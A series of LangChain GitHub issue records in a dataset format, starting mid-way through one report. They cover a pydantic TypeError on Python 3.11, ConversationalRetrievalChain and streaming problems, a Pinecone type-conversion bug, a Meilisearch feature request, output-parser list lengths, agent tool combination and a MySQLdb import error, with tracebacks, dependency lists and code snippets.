File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/tools/__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/tools/arxiv/tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/utilities/__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/utilities/apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/document_loaders/__init__.py", line 44, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/document_loaders/embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 539, in prepare
self.populate_validators()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 801, in populate_validators
*(get_validators() if get_validators else list(find_validators(self.type_, self.model_config))),
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/validators.py", line 696, in find_validators
yield make_typeddict_validator(type_, config)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/validators.py", line 585, in make_typeddict_validator
TypedDictModel = create_model_from_typeddict(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/annotated_types.py", line 35, in create_model_from_typeddict
return create_model(typeddict_cls.__name__, **kwargs, **field_definitions)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 972, in create_model
return type(__model_name, __base__, namespace)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 534, in prepare
self._type_analysis()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 638, in _type_analysis
elif issubclass(origin, Tuple): # type: ignore
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/typing.py", line 1550, in __subclasscheck__
return issubclass(cls, self.__origin__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: issubclass() arg 1 must be a class
```
```
langchain==0.0.230
langchainplus-sdk==0.0.20
Python 3.11.0
Ubuntu 22.04
```
```
maciej@ola:~/workdir/intenzia/langchaintest/chatgpt-retrieval$ pip freeze
aiohttp==3.8.4
aiosignal==1.3.1
anyio==3.7.1
async-timeout==4.0.2
attrs==23.1.0
backoff==2.2.1
certifi==2023.5.7
cffi==1.15.1
chardet==5.1.0
charset-normalizer==3.2.0
chromadb==0.3.27
click==8.1.4
clickhouse-connect==0.6.6
coloredlogs==15.0.1
cryptography==41.0.2
dataclasses-json==0.5.9
duckdb==0.8.1
et-xmlfile==1.1.0
fastapi==0.85.1
filetype==1.2.0
flatbuffers==23.5.26
frozenlist==1.3.3
greenlet==2.0.2
h11==0.14.0
hnswlib==0.7.0
httptools==0.6.0
humanfriendly==10.0
idna==3.4
importlib-metadata==6.8.0
joblib==1.3.1
langchain==0.0.230
langchainplus-sdk==0.0.20
lxml==4.9.3
lz4==4.3.2
Markdown==3.4.3
marshmallow==3.19.0
marshmallow-enum==1.5.1
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nltk==3.8.1
numexpr==2.8.4
numpy==1.25.1
olefile==0.46
onnxruntime==1.15.1
openai==0.27.8
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
overrides==7.3.1
packaging==23.1
pandas==2.0.3
pdf2image==1.16.3
pdfminer.six==20221105
Pillow==10.0.0
posthog==3.0.1
protobuf==4.23.4
pulsar-client==3.2.0
pycparser==2.21
pydantic==1.9.0
pypandoc==1.11
python-dateutil==2.8.2
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz==2023.3
PyYAML==6.0
regex==2023.6.3
requests==2.31.0
six==1.16.0
sniffio==1.3.0
SQLAlchemy==2.0.18
starlette==0.20.4
sympy==1.12
tabulate==0.9.0
tenacity==8.2.2
tiktoken==0.4.0
tokenizers==0.13.3
tqdm==4.65.0
typing-inspect==0.9.0
typing_extensions==4.7.1
tzdata==2023.3
unstructured==0.8.1
urllib3==2.0.3
uvicorn==0.22.0
uvloop==0.17.0
watchfiles==0.19.0
websockets==11.0.3
xlrd==2.0.1
XlsxWriter==3.1.2
yarl==1.9.2
zipp==3.16.0
zstandard==0.21.0
```
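One hedged observation: the freeze shows pydantic==1.9.0, but official Python 3.11 support only landed in pydantic 1.10.2, and this `issubclass() arg 1 must be a class` failure inside pydantic's TypedDict validator is consistent with that gap; upgrading pydantic within v1 (e.g. `pip install --upgrade "pydantic>=1.10.2,<2"`) may resolve it.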
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run this code sample
https://github.com/techleadhd/chatgpt-retrieval
### Expected behavior
Pydantic validation fails: TypeError: issubclass() arg 1 must be a class | BaseEmbaasLoader validation fails | https://api.github.com/repos/langchain-ai/langchain/issues/7609/comments | 3 | 2023-07-12T19:38:41Z | 2023-07-13T07:50:31Z | https://github.com/langchain-ai/langchain/issues/7609 | 1,801,636,599 | 7,609 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.170
openai==0.27.4
python
windows
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am using the "**ConversationalRetrievalChain**". Whenever I send a message to the model with history, it produces wrong results, whereas if I send the same message without history, it produces correct results. The issue here is that the model forms the wrong standalone question, and that same wrong standalone question is passed to the OpenAI model.
Steps to reproduce:
1. Use the Conversational Retrieval Chan
2. Pass the history on to the chain.
3. Send the "Hello" message continuously.
Here you can observe wrong/weired answers.
The above scenario is just an example, but whenever we ask some question and then immediately send the message "Hello", the conversational retrieval chain forms the wrong standalone question, so the OpenAI model produces wrong answers.
This is the code I am using:
```python
_template = """
Use the following pieces of context to answer the question at the end.
{context}
If you still can't find the answer, just say that you don't know; don't try to make up an answer.
You can also look into the chat history.
{chat_history}
Question: {question}
Answer:
"""
CONDENSE_QUESTION_PROMPT = PromptTemplate(
    template=_template,
    input_variables=["context", "question", "chat_history"],
)

chain = ConversationalRetrievalChain.from_llm(
    llm=azure_chat_api_llm_objct,
    retriever=vectors.as_retriever(),
    verbose=True,
    chain_type="stuff",
    memory=memory,
    get_chat_history=lambda h: h,
    # condense_question_prompt=CONDENSE_QUESTION_PROMPT,
    combine_docs_chain_kwargs={"prompt": CONDENSE_QUESTION_PROMPT},
    return_generated_question=True,
)
chain.run("Hello")
```
Note: I have tried multiple approaches, like removing the condense question prompt, running without a prompt, using different types of prompts, etc., but it still produces the wrong standalone question.
For example:
```python
_template = """
Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question.
Chat History:
{chat_history}
Follow Up Input: {question}
Standalone question:
"""
```
Thanks in advance, and please correct me if I made any mistakes in the code.
<img width="458" alt="image" src="https://github.com/hwchase17/langchain/assets/52491904/eb0e3aba-6151-42f8-924b-bda2cb4ccfaf">
### Expected behavior
It should form a proper standalone question when we pass history before passing to model. | If we continuously send "Hello" messages to the "conversational retrieval chain," the model produces weired/wrong answers. | https://api.github.com/repos/langchain-ai/langchain/issues/7606/comments | 9 | 2023-07-12T18:25:59Z | 2024-01-05T13:06:23Z | https://github.com/langchain-ai/langchain/issues/7606 | 1,801,539,064 | 7,606 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.206 ; python_version >= "3.11" and python_version < "4.0"
langchainplus-sdk==0.0.16 ; python_version >= "3.11" and python_version < "4.0"
### Who can help?
@hwaking @agola11 Hey guys! The Pinecone wrapper is doing a weird auto-type conversion: it thinks my string ID values are dates in this part of the code:
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Have a string value set as your Pinecone Document.page_content that could be misinterpreted as a date, e.g. 21070809.
Problem function:
```python
def similarity_search_with_score(
    self,
    query: str,
    k: int = 4,
    filter: Optional[dict] = None,
    namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
    """Return pinecone documents most similar to query, along with scores.

    Args:
        query: Text to look up documents similar to.
        k: Number of Documents to return. Defaults to 4.
        filter: Dictionary of argument(s) to filter on metadata
        namespace: Namespace to search in. Default will search in '' namespace.

    Returns:
        List of Documents most similar to the query and score for each
    """
    if namespace is None:
        namespace = self._namespace
    query_obj = self._embedding_function(query)
    docs = []
    results = self._index.query(
        [query_obj],
        top_k=k,
        include_metadata=True,
        namespace=namespace,
        filter=filter,
    )
    for res in results["matches"]:
        metadata = res["metadata"]
        if self._text_key in metadata:
            text = metadata.pop(self._text_key)
            score = res["score"]
            # if type(text) != str:               # <-- I added this code to convert it back to a string;
            #     text = text.strftime("%Y%m%d")  # <-- if you just recast to str, the problem will resolve
            docs.append((Document(page_content=text, metadata=metadata), score))
        else:
            logger.warning(
                f"Found document with no `{self._text_key}` key. Skipping."
            )
    return docs
```
Stack:
```
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/uvicorn/protocols/http/h11_impl.py", line 428, in run_asgi
[langchain] [2023-07-12 17:43:08] result = await app( # type: ignore[func-returns-value]
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/uvicorn/middleware/proxy_headers.py", line 78, in __call__
[langchain] [2023-07-12 17:43:08] return await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/applications.py", line 282, in __call__
[langchain] [2023-07-12 17:43:08] await super().__call__(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 348, in _sentry_patched_asgi_app
[langchain] [2023-07-12 17:43:08] return await middleware(scope, receive, send)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 141, in _run_asgi3
[langchain] [2023-07-12 17:43:08] return await self._run_app(scope, lambda: self.app(scope, receive, send))
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 190, in _run_app
[langchain] [2023-07-12 17:43:08] raise exc from None
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/asgi.py", line 185, in _run_app
[langchain] [2023-07-12 17:43:08] return await callback()
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/applications.py", line 122, in __call__
[langchain] [2023-07-12 17:43:08] await self.middleware_stack(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/errors.py", line 184, in __call__
[langchain] [2023-07-12 17:43:08] raise exc
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/errors.py", line 162, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, _send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 242, in _sentry_exceptionmiddleware_call
[langchain] [2023-07-12 17:43:08] await old_call(self, scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 79, in __call__
[langchain] [2023-07-12 17:43:08] raise exc
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 68, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, sender)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/starlette.py", line 143, in _create_span_call
[langchain] [2023-07-12 17:43:08] return await old_call(app, scope, new_receive, new_send, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 20, in __call__
[langchain] [2023-07-12 17:43:08] raise e
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 17, in __call__
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 718, in __call__
[langchain] [2023-07-12 17:43:08] await route.handle(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 276, in handle
[langchain] [2023-07-12 17:43:08] await self.app(scope, receive, send)
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/starlette/routing.py", line 66, in app
[langchain] [2023-07-12 17:43:08] response = await func(request)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/sentry_sdk/integrations/fastapi.py", line 131, in _sentry_app
[langchain] [2023-07-12 17:43:08] return await old_app(*args, **kwargs)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/routing.py", line 241, in app
[langchain] [2023-07-12 17:43:08] raw_response = await run_endpoint_function(
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/fastapi/routing.py", line 167, in run_endpoint_function
[langchain] [2023-07-12 17:43:08] return await dependant.call(**values)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 528, in ask_question_0_gateway
[langchain] [2023-07-12 17:43:08] return await ask_question_0(question, user)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 282, in ask_question_0
[langchain] [2023-07-12 17:43:08] response = await pinecone_search(question, metadata_filter)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/search.py", line 274, in pinecone_search
[langchain] [2023-07-12 17:43:08] return pine.similarity_search_with_score(query=question, k=k, filter=filter)
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/langchain/vectorstores/pinecone.py", line 132, in similarity_search_with_score
[langchain] [2023-07-12 17:43:08] docs.append((Document(page_content=text, metadata=metadata), score))
[langchain] [2023-07-12 17:43:08] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[langchain] [2023-07-12 17:43:08] File "/workspace/.heroku/python/lib/python3.11/site-packages/langchain/load/serializable.py", line 64, in __init__
[langchain] [2023-07-12 17:43:08] super().__init__(**kwargs)
[langchain] [2023-07-12 17:43:08] File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
[langchain] [2023-07-12 17:43:08] raise validation_error
[langchain] [2023-07-12 17:43:08] pydantic.error_wrappers.ValidationError: 1 validation error for Document
[langchain] [2023-07-12 17:43:08] page_content
[langchain] [2023-07-12 17:43:08] str type expected (type=type_error.str)
```
### Expected behavior
I would expect my data from Pinecone to come back to my API exactly how I put it there. Remove the auto-conversion or implement strict string type casting to ensure no auto-typing. | Type Error Langchain auto converting string to date.timestamp in Pinecone similarity search when Document pagecontent value is a string that "could" be a date ex: 21070926 | https://api.github.com/repos/langchain-ai/langchain/issues/7605/comments | 2 | 2023-07-12T18:01:54Z | 2023-10-18T16:05:43Z | https://github.com/langchain-ai/langchain/issues/7605 | 1,801,502,750 | 7,605 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | Add support for Meilisearch vector databases | https://api.github.com/repos/langchain-ai/langchain/issues/7603/comments | 3 | 2023-07-12T15:32:23Z | 2023-07-29T00:06:55Z | https://github.com/langchain-ai/langchain/issues/7603 | 1,801,241,754 | 7,603 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python: 3.10.11
LangChain: 0.0.229
OS: Windows, Ubuntu Linux, and Mac
Hi people,
I'm using **ConversationalRetrievalChain** without any modifications, and in 90% of the cases, it responds by repeating words and entire phrases, like in the examples below:
Questions about the book Dune:
**How did Muad'Dib die?**
Muad'Dib died of old age. **No, Muad'Dib did not die of old age**. The passage mentions that the death of Muad'Dib will be followed by the moral suicide of all men, suggesting that his death was not natural. However, the exact cause of his death is not specified in the text. No, Muad'Dib did not die of old age. The passage mentions that the death of Muad'Dib will be followed by the moral suicide of all men, suggesting that his death was not natural. **However, the exact cause of his death is not specified in the text**.
**Was Paul Atreides powerful?**
**Was Paul Atreides powerful? Yes, Paul Atreides was powerful**. He possessed oracle-like abilities and special powers that placed him beyond the usual limits of time and space. Additionally, he was a charismatic leader and skilled strategist, capable of commanding armies and achieving victories. His strength and power were recognized by the emperor and other characters in the book. Yes, Paul Atreides was powerful. **He possessed oracle-like abilities and special powers that placed him beyond the usual limits of time and space. Additionally, he was a charismatic leader and skilled strategist, capable of commanding armies and achieving victories. His strength and power were recognized by the emperor and other characters in the book.**
**PLEASE, Does anyone know about this issue?**
I have repeated several tutorials that I found on the internet, and this always happens. But strangely, I don't see anyone complaining about it in the forums, so I must be doing something wrong.
**This is the code I am using:**
```python
llm = ChatOpenAI(model_name=app_params.Model,
                 temperature=0,
                 openai_api_key=app_keys.OPENAI_API_KEY,
                 streaming=True,
                 verbose=True,
                 callbacks=[WebSocketCallbackHandler(websocket)]
                 )

memory = ConversationBufferWindowMemory(memory_key='chat_history', output_key='answer',
                                        chat_memory=chat_history, return_messages=True,
                                        k=3, verbose=True)

qna = ConversationalRetrievalChain.from_llm(
    llm=llm,
    chain_type="stuff",
    retriever=retriever,
    verbose=True,
    memory=memory,
)

# async
result = await qna.acall({"question": query})
```
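One hedged hypothesis (an assumption worth testing): with streaming=True and a shared callback, the question-condensing step streams its rephrased question through the same WebSocket handler as the answer, which can look like repeated phrases. A sketch, assuming this version's from_llm accepts `condense_question_llm`:
```python
# Stream only the final answer; condense the question with a separate,
# non-streaming LLM so its output never reaches the websocket.
condense_llm = ChatOpenAI(model_name=app_params.Model, temperature=0,
                          openai_api_key=app_keys.OPENAI_API_KEY)
qna = ConversationalRetrievalChain.from_llm(
    llm=llm,                          # streaming, with the websocket callback
    condense_question_llm=condense_llm,
    chain_type="stuff",
    retriever=retriever,
    memory=memory,
)
```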
**I would be very glad for any help!
Best regards,
Marcos.**
Hi, @hwchase17, I appreciate your help.
### Who can help?
Hi, @hwchase17, I appreciate your help.
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**This is the code I am using:**
```python
llm = ChatOpenAI(model_name=app_params.Model,
                 temperature=0,
                 openai_api_key=app_keys.OPENAI_API_KEY,
                 streaming=True,
                 verbose=True,
                 callbacks=[WebSocketCallbackHandler(websocket)]
                 )

memory = ConversationBufferWindowMemory(memory_key='chat_history', output_key='answer',
                                        chat_memory=chat_history, return_messages=True,
                                        k=3, verbose=True)

qna = ConversationalRetrievalChain.from_llm(
    llm=llm,
    chain_type="stuff",
    retriever=retriever,
    verbose=True,
    memory=memory,
)

# async
result = await qna.acall({"question": query})
```
### Expected behavior
I hope the answer provided by ConversationalRetrievalChain makes sense and does not contain repetitions of the question or entire phrases. | ConversationalRetrievalChain with streaming=True => responds by repeating words and phrases | https://api.github.com/repos/langchain-ai/langchain/issues/7599/comments | 10 | 2023-07-12T13:46:03Z | 2024-05-06T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7599 | 1,801,022,338 | 7,599 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I'd like to understand whether there is a way to get from the OpenAI response a **list of values** (strings or objects; it's the same) of a **fixed length**. I read the documentation here: https://python.langchain.com/docs/modules/model_io/output_parsers/comma_separated but I didn't find anything related to length (maybe it's not possible?). Indeed, I understood that these parsers probably only add a well-formatted piece of prompt, so you have no guarantee of getting the expected results.
In my use case, I have a list of texts and I want to have a title on each of them. My prompt is something like that:
```
####
Text 1:
- Bla bla bla
...
Text 8:
- Bla bla bla
###
Use these texts to generate a title for each text. The number of the titles must be 8.
```
At the end of the prompt I "force" the number of titles to match the number of texts, but sometimes the model gives me more titles (especially when the number of texts is 1).
So I thought of using these parsers, but I can't find any constraint on the length of the results; the only related thing is a validator to check whether the length is correct.
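For what it's worth, a hedged sketch: there is no built-in length constraint, but a Pydantic output parser with a validator can at least detect a wrong-length list (and retry parsers can then re-ask). The model and field names here are illustrative:
```python
from typing import List

from pydantic import BaseModel, Field, validator

from langchain.output_parsers import PydanticOutputParser

EXPECTED = 8  # number of input texts


class Titles(BaseModel):
    titles: List[str] = Field(description="exactly one title per input text")

    @validator("titles")
    def check_length(cls, v):
        if len(v) != EXPECTED:
            raise ValueError(f"expected {EXPECTED} titles, got {len(v)}")
        return v


parser = PydanticOutputParser(pydantic_object=Titles)
# Append parser.get_format_instructions() to the prompt; on a failed parse,
# OutputFixingParser / RetryOutputParser can ask the model to correct itself.
```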
### Suggestion:
_No response_ | Output parser set number of list result | https://api.github.com/repos/langchain-ai/langchain/issues/7598/comments | 3 | 2023-07-12T13:31:51Z | 2023-10-19T16:06:03Z | https://github.com/langchain-ai/langchain/issues/7598 | 1,800,994,485 | 7,598 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Hello Langchain community!
I'm currently in the process of developing a company's chatbot, and I've chosen to use both a CSV file and Pinecone DB for the project.
Here's a basic outline of the structure I've adopted so far:

I've managed to set the two tools, and its example usage has been providing accurate answers

The first tool gets me answers based on pandas's result from the example usage; the answers are based on the CSV and are correct in all cases.

I also set the second tool, and its example usage is answered correctly.

Up to here things are very promising, and I expected everything to work as is.
So I set the LLM, combined the two tools, and used an agent:

However, when I combined both tools using an agent, the answers started to deviate from the expected output. I'm not entirely sure whether the method I'm using to utilize the agent is optimal.

To address this issue, I've experimented with the MultiRetrievalQAChain using vector embeddings. But the results are not consistently reliable, and moreover, I'd rather not generate new embeddings every time I modify the CSV.
Is there anyone in the community who can shed light on these issues I'm encountering? Any feedback on my current approach, suggestions on how to optimize it, or alternative strategies would be greatly appreciated!
Thank you.
### Motivation
I'm making a company GPT, and I hope to link my CSV with the chatbot so that whenever I change the CSV, the chatbot automatically picks up the change.
### Your contribution
um solving the problem would help others? | Question!! Multiple agent use? agent within agent? | https://api.github.com/repos/langchain-ai/langchain/issues/7597/comments | 6 | 2023-07-12T13:10:59Z | 2024-03-20T16:05:08Z | https://github.com/langchain-ai/langchain/issues/7597 | 1,800,955,601 | 7,597 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.230
python version: Python 3.9.12
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm trying to run the code mentioned at: https://python.langchain.com/docs/modules/agents/toolkits/sql_database
but I'm getting this error:
ModuleNotFoundError: No module named 'MySQLdb'
Then trying `pip install MySQL-python` gives the following error:
ModuleNotFoundError: No module named 'ConfigParser'
Trying `pip install configparser` doesn't solve the issue either.
Please help me figure out this issue. Thanks!
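For what it's worth, a sketch of the usual fix — `MySQL-python` only supports Python 2 (hence the `ConfigParser` error: that module was renamed `configparser` in Python 3); a pure-Python driver such as PyMySQL avoids this entirely, assuming a MySQL database is being used (the credentials below are placeholders):

```python
# pip install pymysql
from langchain.sql_database import SQLDatabase

# The pymysql dialect keeps SQLAlchemy from looking for MySQLdb.
db = SQLDatabase.from_uri(
    "mysql+pymysql://user:password@host:3306/dbname"  # placeholder credentials
)
```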
